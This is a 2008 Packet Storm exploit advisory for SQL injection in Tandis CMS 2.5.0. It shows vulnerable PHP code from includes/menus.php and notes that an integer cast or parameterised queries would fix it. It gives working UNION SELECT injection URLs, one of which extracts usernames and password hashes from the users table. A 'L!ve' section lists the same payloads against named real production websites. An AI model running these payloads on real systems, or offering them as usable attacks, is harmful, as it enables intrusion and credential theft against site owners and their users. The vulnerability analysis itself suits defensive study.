tandiscms-sql.txt

2008-10-28T00:00:00
ID PACKETSTORM:71280
Type packetstorm
Reporter G4N0K
Modified 2008-10-28T00:00:00

Description

                                        
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Tandis CMS <= 2.5.0 Multiple Remote SQL Injection Vulnerabilities  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
[~] Script: Tandis CMS v2.5.0  
[~] Language : PHP  
[~] WebSite: http://tandiscms.com/  
[~] Affected file: includes/menus.php (pulled into index.php by the include shown at its line 48)  
[~] Type : Commercial  
[~] Report-Date : 27/10/2008  
  
--[ CoDE ]--  
[~] index.php  
{..}  
48 include("./includes/menus.php");  
{..}  
[~] /includes/menus.php  
{...}  
27 if (isset($_GET['cpage'])) {  
28 $pagecode = $_GET['cpage'];  
xx {...}  
40 $result = mysql_query("SELECT * FROM ".$tandisversion."menus where(menuparentcode=".$pagecode." AND tid=".$_SESSION['curr_tandis_id'].")");  
--------------------------  
[~] Note: $pagecode is taken straight from $_GET['cpage'] and concatenated unquoted into a numeric comparison, so magic_quotes_gpc / addslashes would not stop this; the fix is to cast it ((int)$_GET['cpage']) or to use a parameterised query.  
{...}  
295 if (!isset($_GET['nid'])) {  
296 print "[ERROR] You Change Standard Parameters<br>This System Protected By NNET SECURITY !";   
297 exit();  
298 }  
299 $page_content = array();  
300 $result = mysql_query("SELECT ".$tandisversion."tblnews.*,".$tandisversion."contents.content as cnt FROM ".$tandisversion."tblnews,".$tandisversion."contents where (nid=".$_GET['nid']." AND ".$tandisversion."tblnews.nmessage=".$tandisversion."contents.id)");  
{...}  
[~] Note: the isset() check at line 295 only tests that nid is present, not that it is numeric; $_GET['nid'] is still concatenated unquoted into the query, so the same cast-to-int or parameterised-query fix applies here.  
  
--[ /CoDE ]--  
  
--[ DoRK ]--  
WTF...!?  
sry kidz...!  
no more d0rk.  
  
--[ Founder ]--  
G4N0K <mail.ganok[at]gmail.com>  
  
  
--[ Exploit ]-- (the number of columns in each UNION must match the vulnerable SELECT; since the nid query selects tblnews.* plus cnt, the 13-column PoC presumably depends on the exact table layout of this version)  
[~] http://localhost/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--  
[~] http://localhost/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--  
  
  
--[ L!ve ]-- (exploit URLs as published against third-party production hosts; do not run these against systems you are not authorised to test)  
http://tandiscms.com/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--  
http://tandiscms.com/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--  
http://www.geomatic.ir/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--  
http://www.geomatic.ir/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--  
  
  
--[ Greetz ]--  
[~] ALLAH  
[~] Tornado2800 <Tornado2800[at]gmail.com>  
[~] Hussain-X <darkangel_g85[at]yahoo.com>  
  
  
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)  
//ALLAH, forgimme...  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
exit(); //EoX  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=